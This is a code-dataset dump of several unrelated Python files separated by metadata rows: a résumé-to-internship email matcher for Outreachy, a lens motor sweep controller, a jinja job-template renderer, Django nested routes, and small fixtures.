            # union combines the list of sets and removes duplicates.
            keywords = set.union(*matches)
            if all(matches):
                resume.strongProjectMatches.append((project, keywords))
                project.strongResumeMatches.append(resume)
            elif any(matches):
                resume.weakProjectMatches.append((project, keywords))
                project.weakResumeMatches.append(resume)


def matchWithProjects(resumeFiles):
    goldresumes = []
    matchResumes(resumeFiles)
    #for project in projectsMay2017:
    #    print(len(project.strongResumeMatches), '\t', project.name, '\t', project.description)
    #print('Resumes to review:', len([resume for resume in resumeFiles if len(resume.strongProjectMatches) > 0]))
    #print('Resumes with strong matches:')
    #for i in range(1, 9):
    #    resumeCount = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == i]
    #    if resumeCount:
    #        print(len(resumeCount), 'with', i, 'strong matches')
    #resumeCount = [resume for resume in resumeFiles if len(resume.strongProjectMatches) > 9]
    #if resumeCount:
    #    print(len(resumeCount), 'with > 10 matches')
    #print('Resumes with weak matches:')
    #for i in range(1, 9):
    #    resumeCount = [resume for resume in resumeFiles
    #                   if not resume.strongProjectMatches and len(resume.weakProjectMatches) == i]
    #    if resumeCount:
    #        print(len(resumeCount), 'with', i, 'weak matches')
    #resumeCount = [resume for resume in resumeFiles
    #               if not resume.strongProjectMatches and len(resume.weakProjectMatches) > 9]
    #if resumeCount:
    #    print(len(resumeCount), 'with > 10 matches')


header1 = '''From: Sarah Sharp <saharabeara@gmail.com>
'''

header3 = '''Reply-to: outreachy-admins@gnome.org
Subject: Internship opportunities

'''

noBooth = '''Greetings! I'm Sarah Sharp, and we both attended the Tapia
conference last September. I'd like to invite you to apply to two
programs that provide paid internships in open source. Interns will
work remotely with experienced mentors.

'''

# offer to host Outreachy session if they signed up at the booth or mention open
# source in their resume?
# What about the students at universities hosting introductory sessions?
atBooth = '''Greetings! I'm Sarah Sharp, and we met when you stopped by the
Outreachy booth at the Tapia conference last September. I'd like to
invite you to apply to two programs that provide paid internships.
Interns will work remotely with experienced mentors.

'''

generalInfo = '''Google Summer of Code is open to all university students:
https://developers.google.com/open-source/gsoc/

Outreachy is open internationally to women (both cis & trans), trans men,
and genderqueer folks. It is also open to U.S. residents and nationals of
any gender who are Black/African American, Hispanic/Latin@, American Indian,
Alaska Native, Native Hawaiian, or Pacific Islander.
https://wiki.gnome.org/Outreachy/

Both programs offer internships from May 30 to August 30. Google Summer of
Code application process runs from Feb 28 to Apr 3, while Outreachy's
application process runs from Feb 16 to Mar 30. Google Summer of Code
application only requires a project proposal. Outreachy also requires
applicants to make project contributions.

'''

moreInfo = '''The full list of Outreachy internship projects is available at:
https://wiki.gnome.org/Outreachy/2017/MayAugust

Please let me know if you have any questions about the Outreachy program.
Outreachy coordinators (Marina, Karen, Cindy, Tony, and I) can all be
reached at outreachy-admins@gnome.org

You can contact all organization mentors by emailing outreachy-list@gnome.org

I hope you'll apply! Thanks,

Sarah Sharp
'''

# TODO:
# 1. Remove the generic description when we have a good resume match;
#    it's more personal.

LINEWRAP = 68


def writeInitialInvitation(emaildir, resume, boothlist, matches):
    project, keywords = matches[0]
    para = ("Based on your resume, if you're eligible for Outreachy, "
            "it looks like you might be a good fit for an internship with " +
            project.name)
    if project.short:
        para = para + ' (' + project.short + ')'
    if not project.description:
        return textwrap.fill(para + '.', LINEWRAP, replace_whitespace=False) + '\n\n'
    para = para + ' which is offering an internship to ' + project.description
    keywords = [k for k in keywords if k.lower() not in project.printskip]
    if keywords:
        para = para + ' that involves working with '
        k = list(set(keywords))
        if len(k) == 1:
            para = para + k[0]
        elif len(k) == 2:
            para = para + ' and '.join(k)
        else:
            para = para + ', '.join(k[:-1]) + ' and ' + k[-1]
    return para


def writeStrongInvitation(emaildir, resume, boothlist):
    matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1]))
    project, keywords = matches[0]
    para = writeInitialInvitation(emaildir, resume, boothlist, matches)
    if len(resume.strongProjectMatches) > 1:
        para = (para + '. You may also be interested in the ' +
                project.name + ' internship')
        if len(resume.strongProjectMatches) > 2:
            para = para + 's to '
        else:
            para = para + ' to '
        descriptions = []
        for project, keywords in matches[1:-1]:
            para = para + project.description + ' or the internship to '
        para = para + matches[-1][0].description
    return textwrap.fill(para + '.', LINEWRAP) + '\n\n'


def writeMultipleStrongInvitation(emaildir, resume, boothlist):
    matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1]))
    project, keywords = matches[0]
    para = writeInitialInvitation(emaildir, resume, boothlist, matches)
    doneProjects = set()
    for project, keywords in matches[1:]:
        projmatches = [(p, k) for p, k in matches[1:]
                       if p not in doneProjects and p.name == project.name]
        if not projmatches:
            continue
        doneProjects.add(project)
        for p, k in projmatches:
            para = (para + '. You may also be interested in the ' +
                    p.name + ' internship')
            if not p.description:
                break
            if len(projmatches) > 2:
                para = para + 's to '
            else:
                para = para + ' to '
            descriptions = []
            for p2, k2 in projmatches[1:-1]:
                para = para + p2.description + ' or the internship to '
            para = para + projmatches[-1][0].description
    return textwrap.fill(para + '.', LINEWRAP) + '\n\n'


class emailType(Enum):
    strong = 1
    mixed = 2
    weak = 3


def craftEmail(emaildir, resume, boothlist, strength):
    email = header1 + 'To: ' + ', '.join(resume.emails) + '\n' + header3
    if resume.pdfFileName in boothlist:
        email = email + atBooth
    else:
        email = email + noBooth
    if strength is emailType.strong:
        email = (email + generalInfo +
                 writeStrongInvitation(emaildir, resume, boothlist) +
                 moreInfo)
    elif strength is emailType.mixed:
        email = (email + generalInfo +
                 writeMultipleStrongInvitation(emaildir, resume, boothlist) +
                 moreInfo)
    ext = '-email.txt'
    with open(os.path.join(emaildir,
                           os.path.splitext(resume.textFileName)[0] + ext), 'w') as f:
        f.write(email)


def createFormEmails(directory, resumeFiles, boothlist):
    # For all resumes with one strong match or multiple strong matches with the same organization:
    #  - Create a directory with the organization name (lowercase, with spaces replaced with dashes)
    #  - Copy pdf resume into that directory, create basename-email.txt
    oneStrong = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == 1]
    print('Resumes with exactly one match:', len(oneStrong))
    left = [resume for resume in resumeFiles if resume not in oneStrong]
    for resume in left:
        if not resume.strongProjectMatches:
            continue
        firstMatch = resume.strongProjectMatches[0][0].name
        for match in resume.strongProjectMatches[1:]:
            if match[0].name != firstMatch:
                firstMatch = ''
                break
        if firstMatch:
            oneStrong.append(resume)
    left = [resume for resume in resumeFiles if resume not in oneStrong]
    print('Resumes with exactly one match or multiple matches with same org:', len(oneStrong))
    print('Other resumes:', len(left))
    for project in projectsMay2017:
        matches = [resume for resume in oneStrong
                   if resume.strongProjectMatches[0][0].name == project.name]
        if not matches:
            continue
        dirpath = os.path.join(directory,
                               'emails-' + re.sub(r'\s+', '-', project.name.lower()))
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        for resume in matches:
            try:
                if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)):
                    copyfile(os.path.join(directory, resume.pdfFileName),
                             os.path.join(dirpath, resume.pdfFileName))
            except OSError:
                print('Could not find pdf file for', resume.textFileName)
                continue
            craftEmail(dirpath, resume, boothlist, emailType.strong)

    # For all resumes with strong matches with multiple orgs (but less than 4 orgs):
    #  - Create a directory called strong-mixed.
    #  - Copy pdf resume into that directory, create basename-email.txt
    #
    # "Based on your resume, it looks like you might be interested in an
    # internship with $PROJECT that involves $KEYWORDS which is offering an
    # internship for $DESCRIPTION.
    #
    # Additionally, you might be interested in $PROJECT that involves $KEYWORDS
    # which is offering an internship for $DESCRIPTION."
    mixed = [resume for resume in resumeFiles
             if resume not in oneStrong and resume.strongProjectMatches]
    dirpath = os.path.join(directory, 'mixed')
    if not os.path.exists(dirpath):
        os.makedirs(dirpath)
    for resume in mixed:
        try:
            if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)):
                copyfile(os.path.join(directory, resume.pdfFileName),
                         os.path.join(dirpath, resume.pdfFileName))
        except OSError:
            print('Could not find pdf file for', resume.textFileName)
            continue
        craftEmail(dirpath, resume, boothlist, emailType.mixed)

    # For all resumes with strong matches with 4 or more orgs:
    #  - Create a directory called strong-scattered.
    #  - Copy pdf resume into that directory, create basename-email.txt

    # For all weakly matched resumes - figure out top keywords that matched weak resumes.
    hitcount = Counter()
    for resume in [resume for resume in resumeFiles if not resume.strongProjectMatches]:
        allkeywords = set()
        for project, keywords in resume.weakProjectMatches:
            allkeywords.update(keywords)
            for keyword in keywords:
                allkeywords.add(keyword)
        hitcount.update(allkeywords)
    # Take the top N keywords that weakly matched, find all projects that matched those keywords.
    # "Based on your resume, it looks like you might be interested in Outreachy
    # projects involving $KEYWORD like $MATCHES"


def craftGenericEmail(emaildir, resume):
    if not resume.emails:
        address = ''
    else:
        address = resume.emails[0]
    email = header1 + 'To: ' + address + '\n' + header3
    email = email + noBooth
    email = (email + generalInfo + moreInfo)
    ext = '-email.txt'
    with open(os.path.join(emaildir,
                           os.path.splitext(resume.textFileName)[0] + ext), 'w') as f:
        f.write(email)


def main():
    parser = argparse.ArgumentParser(description='Search text resume files for skillset matches.')
    parser.add_argument('dir', help='Directory with .txt resume files')
    parser.add_argument('--csv', help='CSV file with name <email>,matching resume file of people who stopped by the booth')
    parser.add_argument('--notus', help='Directory with .txt resumes files that may be non-U.S. residents')
    parser.add_argument('--done', help='Directory with .txt resume files that have been contacted')
    parser.add_argument('--generic', help='Simply create generic emails and ignore project matches', default=False)
    #parser.add_argument('matches', help='file to write potential matches to')
    args = parser.parse_args()

    resumeFiles = readResumeFiles(args.dir)

    # Check to see if we have resumes to process that we've already
    # sent email to.
    doneResumes = []   # default when --done is not given
    notusResumes = []  # default when --notus is not given
    if args.done:
        doneResumes = readResumeFiles(args.done)
        emails = [resume.emails[0] for resume in doneResumes if resume.emails]
        for email in emails:
            pdfs = [resume.pdfFileName for resume in resumeFiles
                    if resume.emails and resume.emails[0] == email]
            matches = [resume.pdfFileName for resume in doneResumes
                       if resume.emails and resume.emails[0] == email]
            if pdfs:
                print('Already contacted:', email, ' '.join(pdfs),
                      'matches done resume', ' '.join(matches))
    if args.notus:
        notusResumes = readResumeFiles(args.notus)

    if args.generic:
        genericdir = os.path.join(args.dir, 'generic-todo')
        if not os.path.exists(genericdir):
            os.makedirs(genericdir)
        for resume in resumeFiles:
            craftGenericEmail(genericdir, resume)
        return

    boothstops = (searchForEmail(args.csv, resumeFiles) +
                  searchForEmail(args.csv, doneResumes) +
                  searchForEmail(args.csv, notusResumes))
    boothlist = set()
    for email, filelist in boothstops:
        boothlist.update(filelist)
    print('Booth stop list', boothstops)
    print('Booth stop pdfs', boothlist)
    print('Done resumes', [resume.pdfFileName for resume in doneResumes])

    matchWithProjects(resumeFiles)

    boothandresume = len([resume for resume in resumeFiles
                          if resume.pdfFileName in boothlist and len(resume.strongProjectMatches)])
    print('People who stopped by the booth who have a resume and need an email:',
          boothandresume)
    print('People who stopped by the booth who have a resume and have been sent email:',
          len([resume for resume in doneResumes if resume.pdfFileName in boothlist]))
    print('People who stopped by the booth who have a resume and may be non-U.S. citizens:',
          len([resume for resume in notusResumes if resume.pdfFileName in boothlist]))

    createFormEmails(args.dir, resumeFiles, boothlist)


if __name__ == "__main__":
    main()
48.839204
271
0.62304
3,565
31,892
5.56662
0.223562
0.013152
0.014966
0.017737
0.408869
0.323558
0.261124
0.204837
0.185739
0.162509
0
0.005901
0.266744
31,892
652
272
48.91411
0.84272
0.157657
0
0.258873
0
0.004175
0.363789
0.018087
0
0
0
0.001534
0
1
0.02714
false
0
0.016701
0
0.070981
0.033403
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822032599db3ee1487dab68a324fbb6a098cbc67
6,292
py
Python
src/gui_L087 (for C1_PRO_X18 camera) PARFOCAL_DEMO/sweep.py
Kurokesu/SCF4-SDK
264437a9597885f4eae57e8a717ea2b15a04172e
[ "MIT" ]
13
2019-11-20T08:53:53.000Z
2021-12-21T14:05:37.000Z
src/gui_L087 (for C1_PRO_X18 camera) PARFOCAL_DEMO/sweep.py
Kurokesu/SCF4-SDK
264437a9597885f4eae57e8a717ea2b15a04172e
[ "MIT" ]
19
2020-08-09T05:24:03.000Z
2021-07-01T07:07:37.000Z
src/gui_L087 (for C1_PRO_X18 camera) PARFOCAL_DEMO/sweep.py
Kurokesu/SCF4-SDK
264437a9597885f4eae57e8a717ea2b15a04172e
[ "MIT" ]
3
2020-03-30T12:51:55.000Z
2021-08-09T11:22:29.000Z
import cv2
import os
import serial
import sys
import scf4_tools
import time
import threading
import camera
import numpy as np
from scipy.interpolate import interp1d
from tqdm import tqdm

CHB_MOVE = 7
CHA_MOVE = 6
CHB_PI = 4
CHA_PI = 3


def parse_data(data):
    out_x = []
    out_y = []
    for i in data:
        p2 = i.split(" ")
        out_x.append(int(p2[0]))
        out_y.append(int(p2[1]))
    return out_x, out_y


def scale(val, src, dst):
    return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]


ser = serial.Serial()
ser.port = 'COM231'    # Controller com port
ser.baudrate = 115200  # BAUD rate when connected over CDC USB is not important
ser.timeout = 5        # max timeout to wait for command response

print("Open COM port:", ser.port)
ser.open()
ser.flushInput()
ser.flushOutput()

c = camera.Cam()
print("Starting cam")
c.start()
print("Waiting for camera")
while c.fps == 0:
    time.sleep(0.1)  # should be implemented with queue/signals but good enough for testing
print("Cam is operational")
c.set_cam_text("Prepare")

print("Read controller version strings")
scf4_tools.send_command(ser, "$S", echo=True)
print("Initialize controller")
scf4_tools.send_command(ser, "$B2", echo=True)
print("# Set motion to forced mode")
scf4_tools.send_command(ser, "M231 A", echo=True)
print("Set stepping mode")
scf4_tools.send_command(ser, "M243 C6", echo=True)
print("Set normal move")
scf4_tools.send_command(ser, 'M230', echo=True)
print("Set to rel movement mode")
scf4_tools.send_command(ser, 'G91', echo=True)
print("Energize PI leds")
scf4_tools.send_command(ser, "M238", echo=True)
print("Set motor power")
scf4_tools.send_command(ser, "M234 A190 B190 C190 D90", echo=True)
print("Set motor sleep power")
scf4_tools.send_command(ser, "M235 A120 B120 C120", echo=True)
print("Set motor drive speed")
scf4_tools.send_command(ser, "M240 A600 B600 C600", echo=True)
print("Set PI low/high detection voltage")
scf4_tools.send_command(ser, "M232 A400 B400 C400 E700 F700 G700", echo=True)
print("Filter = VIS")
scf4_tools.send_command(ser, "M7", echo=True)

c.set_cam_text("Homing A")
print()
print("Home axis A")
print("Get status")
status_str = scf4_tools.send_command(ser, "!1")
status = scf4_tools.parse_status(status_str)
print(status_str)

if status[3] == 0:
    print("Dir 1")
    scf4_tools.send_command(ser, "G91")
    scf4_tools.send_command(ser, "M231 A")  # Set motion to forced mode
    scf4_tools.send_command(ser, "G0 A+100")
    scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI)
else:
    print("Dir 2")
    scf4_tools.send_command(ser, "G91")
    scf4_tools.send_command(ser, "M231 A")  # Set motion to forced mode
    scf4_tools.send_command(ser, "G0 A-100")
    scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI)  # Wait until homing is over

print("Motor normal mode")
scf4_tools.send_command(ser, "M230 A")  # Set motion back to normal mode
scf4_tools.send_command(ser, "G0 A-200")
scf4_tools.wait_homing(ser, 1, CHA_MOVE)  # Wait until homing is over

print("Motor forced mode")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A")  # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A+100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI)  # Wait until homing is over

print("Set current coordinate as middle")
scf4_tools.send_command(ser, "G92 A32000")  # set current coordinate to 32000
scf4_tools.send_command(ser, "M230 A")      # Set motion back to normal mode
scf4_tools.send_command(ser, "G90")

c.set_cam_text("Homing B")
print()
print("Home axis B")
print("Get status")
status_str = scf4_tools.send_command(ser, "!1")
status = scf4_tools.parse_status(status_str)
print(status_str)

if status[4] == 0:
    print("Dir 1")
    scf4_tools.send_command(ser, "G91")
    scf4_tools.send_command(ser, "M231 B")  # Set motion to forced mode
    scf4_tools.send_command(ser, "G0 B+100")
    scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI)
else:
    print("Dir 2")
    scf4_tools.send_command(ser, "G91")
    scf4_tools.send_command(ser, "M231 B")  # Set motion to forced mode
    scf4_tools.send_command(ser, "G0 B-100")
    scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI)  # Wait until homing is over

print("Motor normal mode")
scf4_tools.send_command(ser, "M230 B")  # Set motion back to normal mode
scf4_tools.send_command(ser, "G0 B-200")
scf4_tools.wait_homing(ser, 1, CHB_MOVE)  # Wait until homing is over

print("Motor forced mode")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B")  # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B+100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI)  # Wait until homing is over

print("Set current coordinate as middle")
scf4_tools.send_command(ser, "G92 B32000")  # set current coordinate to 32000
scf4_tools.send_command(ser, "M230 B")      # Set motion back to normal mode
scf4_tools.send_command(ser, "G90")

with open('line_inf2.txt') as f:
    lines = f.readlines()

x, y = parse_data(lines)
x, y = parse_data(lines)
xi = np.linspace(min(x), max(x), num=max(x)-min(x), endpoint=True)
yi = interp1d(x, y, kind='cubic')

new_list2 = []
for i in range(min(x), max(x), 10):
    y = float(np.asarray(yi(i)))
    new_list2.append((i, y))

# reverse motion direction (from wide to narrow)
new_list2 = new_list2[::-1]

print("Set motor drive speed")
scf4_tools.send_command(ser, "M240 A500 B500 C500", echo=True)

c.set_cam_text("Moving to wide angle")
(x, y) = new_list2[0]
scf4_tools.send_command(ser, "G0 A"+str(x))
scf4_tools.wait_homing(ser, 1, CHA_MOVE)  # Wait until homing is over
scf4_tools.send_command(ser, "G0 B"+str(y))
scf4_tools.wait_homing(ser, 1, CHB_MOVE)  # Wait until homing is over
print("Done")
time.sleep(1)

for i in tqdm(range(len(new_list2))):
    (x, y) = new_list2[i]
    zoom = round(scale(x, (39800, 22600), (5.5, 95)), 1)
    c.set_cam_text("Focal length: "+str(zoom)+"mm")
    scf4_tools.send_command(ser, "G0 A"+str(x) + " B"+str(y))
    time.sleep(0.001)

c.set_cam_text("Sleeping 10s")
time.sleep(10)
f.close()
time.sleep(10)
c.stop()
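`scale()` above is a plain linear map between two ranges, which is how the sweep converts a motor position into the focal-length label shown on the camera overlay. A quick standalone check (endpoint values copied from the sweep loop; the midpoint is arbitrary):

def scale(val, src, dst):
    # Linearly map val from the src range onto the dst range.
    return ((val - src[0]) / (src[1] - src[0])) * (dst[1] - dst[0]) + dst[0]

print(scale(39800, (39800, 22600), (5.5, 95)))  # -> 5.5   (wide end)
print(scale(22600, (39800, 22600), (5.5, 95)))  # -> 95.0  (tele end)
print(scale(31200, (39800, 22600), (5.5, 95)))  # -> 50.25 (halfway)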
23.833333
90
0.687381
1,043
6,292
3.981783
0.21093
0.127859
0.143992
0.221527
0.627498
0.574524
0.538888
0.522755
0.522273
0.507826
0
0.064709
0.177209
6,292
263
91
23.923954
0.737493
0.124285
0
0.372671
0
0
0.175237
0
0
0
0
0
0
1
0.012422
false
0
0.068323
0.006211
0.093168
0.223602
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
8220698c204a1446ed030218727b2f760902286f
61
py
Python
echo_text_classifiers/__init__.py
nschaetti/PAN17-author-profiling
c1d1041bbdc4b631709b1cbc134c562fcff2b542
[ "Apache-2.0" ]
1
2022-03-07T15:45:06.000Z
2022-03-07T15:45:06.000Z
echo_text_classifiers/__init__.py
nschaetti/PAN17-author-profiling
c1d1041bbdc4b631709b1cbc134c562fcff2b542
[ "Apache-2.0" ]
null
null
null
echo_text_classifiers/__init__.py
nschaetti/PAN17-author-profiling
c1d1041bbdc4b631709b1cbc134c562fcff2b542
[ "Apache-2.0" ]
null
null
null
# Import
from .EchoTextClassifier import EchoTextClassifier
15.25
50
0.852459
5
61
10.4
0.6
0
0
0
0
0
0
0
0
0
0
0
0.114754
61
3
51
20.333333
0.962963
0.098361
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
5
82216f99b184a3762b1bf3acde24777396628147
5,053
py
Python
liquid_node/jobs/__init__.py
admariner/node
611795e17aa52c50795cb81c1ffebd641dcab51b
[ "MIT" ]
null
null
null
liquid_node/jobs/__init__.py
admariner/node
611795e17aa52c50795cb81c1ffebd641dcab51b
[ "MIT" ]
3
2021-11-10T11:08:14.000Z
2021-11-26T13:12:20.000Z
liquid_node/jobs/__init__.py
admariner/node
611795e17aa52c50795cb81c1ffebd641dcab51b
[ "MIT" ]
null
null
null
import subprocess
import logging
import os
from pathlib import Path

from ..docker import docker
import jinja2

log = logging.getLogger(__name__)

TEMPLATES = Path(__file__).parent.parent.parent.resolve() / 'templates'


def set_volumes_paths(substitutions={}):
    """Sets the volumes paths in the job options

    :param substitutions: dictionary containing the job options
    :returns: the job options
    :rtype: dict
    """
    from ..configuration import config

    substitutions['config'] = config
    substitutions['liquid_domain'] = config.liquid_domain
    substitutions['liquid_volumes'] = config.liquid_volumes
    substitutions['liquid_collections'] = config.liquid_collections
    substitutions['liquid_http_port'] = config.liquid_http_port
    substitutions['liquid_2fa'] = config.liquid_2fa
    substitutions['check_interval'] = config.check_interval
    substitutions['check_timeout'] = config.check_timeout
    substitutions['consul_url'] = config.consul_url

    substitutions['exec_command'] = docker.exec_command_str

    substitutions['https_enabled'] = config.https_enabled
    if config.https_enabled:
        substitutions['liquid_https_port'] = config.liquid_https_port
        substitutions['acme_email'] = config.https_acme_email
        substitutions['acme_caServer'] = config.https_acme_caServer

    repos = {
        'snoop2': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-snoop2'),
            'target': '/opt/hoover/snoop'
        },
        'search': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-search'),
            'target': '/opt/hoover/search'
        },
        'ui_src': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/src'),
            'target': '/opt/hoover/ui/src'
        },
        'ui_pages': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/pages'),
            'target': '/opt/hoover/ui/pages'
        },
        'ui_styles': {
            'org': 'hoover',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/styles'),
            'target': '/opt/hoover/ui/styles'
        },
        'core': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'core'),
            'target': '/app'
        },
        'authproxy': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'authproxy'),
            'target': '/app'
        },
        'codimd_server': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'codimd-server'),
            'target': '/app',
        },
        'dokuwiki': {
            'org': 'liquidinvestigations',
            'local': os.path.join(config.liquidinvestigations_repos_path, 'liquid-dokuwiki'),
            'target': '/liquid',
        },
    }
    for repo, repo_config in repos.items():
        key_repo = f"{repo_config['org']}_{repo}_repo"
        key_git = f"{repo_config['org']}_{repo}_git"
        substitutions[key_repo] = ''
        substitutions[key_git] = ''
        if config.mount_local_repos:
            if Path(repo_config['local']).is_dir():
                substitutions[key_repo] = f"\"{repo_config['local']}:{repo_config['target']}\",\n"
                tag = subprocess.check_output(
                    f"git -C {repo_config['local']} describe --tags --dirty --broken",
                    shell=True,
                ).decode('utf-8').strip()
                md5sum = subprocess.check_output(
                    f"git -C {repo_config['local']} diff HEAD | md5sum",
                    shell=True,
                ).decode('utf-8').strip()
                substitutions[key_git] = tag + md5sum
            else:
                log.warn(f'Invalid repo path "{repo_config["local"]}"')

    return substitutions


def render(template, subs):
    from ..configuration import config

    env = jinja2.Environment(
        variable_start_string="${",
        variable_end_string="}",
        loader=jinja2.FileSystemLoader(str(config.templates)),
    )
    env.globals['int'] = int
    env.globals['max'] = max
    return env.from_string(template).render(subs)


def get_job(hcl_path, substitutions={}):
    """Return the job description generated from the given template

    :param hcl_path: the path to the hcl template file
    :param substitutions: dictionary containing the job options
    :returns: the job description
    :rtype: str
    """
    with hcl_path.open() as job_file:
        template = job_file.read()
    output = render(template, set_volumes_paths(substitutions))
    return output


class Job:
    vault_secret_keys = ()
    core_oauth_apps = ()
    stage = 2
    generate_oauth2_proxy_cookie = False
    extra_secret_fn = None
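A hedged sketch of the `${...}` template style `render()` expects; the template string below is invented, not one of the repo's HCL templates, and the motivation for the custom delimiters (avoiding a clash with `{{ ... }}` blocks already present in the job specs) is an assumption:

import jinja2

# Same delimiter convention as render() above: Jinja variables are
# written as ${...} instead of the default {{...}}.
env = jinja2.Environment(variable_start_string="${", variable_end_string="}")
env.globals['int'] = int
env.globals['max'] = max

template = 'http_port = ${max(liquid_http_port, 80)}'
print(env.from_string(template).render({'liquid_http_port': 9999}))
# -> http_port = 9999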
34.141892
98
0.610133
527
5,053
5.637571
0.275142
0.021205
0.033322
0.045439
0.317065
0.296533
0.280377
0.280377
0.280377
0.252777
0
0.003739
0.259054
5,053
147
99
34.37415
0.789797
0.070453
0
0.150442
0
0
0.209122
0.032702
0
0
0
0
0
1
0.026549
false
0
0.070796
0
0.176991
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82217d544e3cd1e38f1b553da33b7d271e94aff5
389
py
Python
morepath/tests/fixtures/method.py
DuncanBetts/morepath
acad10489b051df9c512f6735a9338854745a599
[ "BSD-3-Clause" ]
null
null
null
morepath/tests/fixtures/method.py
DuncanBetts/morepath
acad10489b051df9c512f6735a9338854745a599
[ "BSD-3-Clause" ]
null
null
null
morepath/tests/fixtures/method.py
DuncanBetts/morepath
acad10489b051df9c512f6735a9338854745a599
[ "BSD-3-Clause" ]
null
null
null
import morepath


class app(morepath.App):
    pass


class StaticMethod(object):
    pass


class Root(object):
    def __init__(self):
        self.value = 'ROOT'

    @staticmethod
    @app.path(model=StaticMethod, path='static')
    def static_method():
        return StaticMethod()


@app.view(model=StaticMethod)
def static_method_default(self, request):
    return "Static Method"
15.56
48
0.678663
45
389
5.711111
0.444444
0.140078
0.116732
0
0
0
0
0
0
0
0
0
0.210797
389
24
49
16.208333
0.837134
0
0
0.133333
0
0
0.059126
0
0
0
0
0
0
1
0.2
false
0.133333
0.066667
0.133333
0.6
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
1
0
0
0
2
8222def448064d7e5190de17a9fd652126451dc7
1,035
py
Python
v8webconsole/webconsole/urls.py
zeerayne/1cv8-webconsole
3f562b5458ed6e6e221c7d78886a49f89b07e4f9
[ "MIT" ]
null
null
null
v8webconsole/webconsole/urls.py
zeerayne/1cv8-webconsole
3f562b5458ed6e6e221c7d78886a49f89b07e4f9
[ "MIT" ]
null
null
null
v8webconsole/webconsole/urls.py
zeerayne/1cv8-webconsole
3f562b5458ed6e6e221c7d78886a49f89b07e4f9
[ "MIT" ]
null
null
null
from django.urls import include
from django.conf.urls import url
from rest_framework.routers import SimpleRouter
from rest_framework_nested.routers import NestedSimpleRouter
from .views import (
    HostViewSet,
    HostAdminViewSet,
    ClusterViewSet,
    InfobaseViewSet,
)

host_router = SimpleRouter()
host_router.register(r'hosts', HostViewSet, basename='host')

host_admin_router = NestedSimpleRouter(host_router, r'hosts', lookup='host')
host_admin_router.register(r'admins', HostAdminViewSet, basename='host-admin')

cluster_router = NestedSimpleRouter(host_router, r'hosts', lookup='host')
cluster_router.register(r'clusters', ClusterViewSet, basename='cluster')

infobase_router = NestedSimpleRouter(cluster_router, r'clusters', lookup='cluster')
infobase_router.register(r'infobases', InfobaseViewSet, basename='infobase')

urlpatterns = [
    url(r'^', include(host_router.urls)),
    url(r'^', include(host_admin_router.urls)),
    url(r'^', include(cluster_router.urls)),
    url(r'^', include(infobase_router.urls)),
]
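For orientation, drf-nested-routers builds the nested URL prefixes from the `lookup` arguments above, so the registered routes should look roughly like this (the `{host_pk}`/`{cluster_pk}` kwarg names are inferred from the library's convention and are an assumption):

# hosts/                                            host list/detail (SimpleRouter)
# hosts/{host_pk}/admins/                           HostAdminViewSet
# hosts/{host_pk}/clusters/                         ClusterViewSet
# hosts/{host_pk}/clusters/{cluster_pk}/infobases/  InfobaseViewSet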
34.5
83
0.774879
122
1,035
6.401639
0.262295
0.06402
0.076825
0.053777
0.208707
0.128041
0.128041
0.128041
0
0
0
0
0.100483
1,035
29
84
35.689655
0.838883
0
0
0
0
0
0.090821
0
0
0
0
0
0
1
0
false
0
0.208333
0
0.208333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82240b4e497af879de2b8332d733c22fc5035c5f
6,292
py
Python
gifploter.py
Lupin1998/inv-ML
9f3db461911748292dff18024587538eb66d44bf
[ "MIT" ]
1
2021-12-14T09:16:17.000Z
2021-12-14T09:16:17.000Z
gifploter.py
Lupin1998/inv-ML
9f3db461911748292dff18024587538eb66d44bf
[ "MIT" ]
null
null
null
gifploter.py
Lupin1998/inv-ML
9f3db461911748292dff18024587538eb66d44bf
[ "MIT" ]
2
2021-12-14T09:10:00.000Z
2022-01-21T16:57:44.000Z
import matplotlib.pyplot as plt
import imageio
import os
import numpy as np


class GIFPloter():
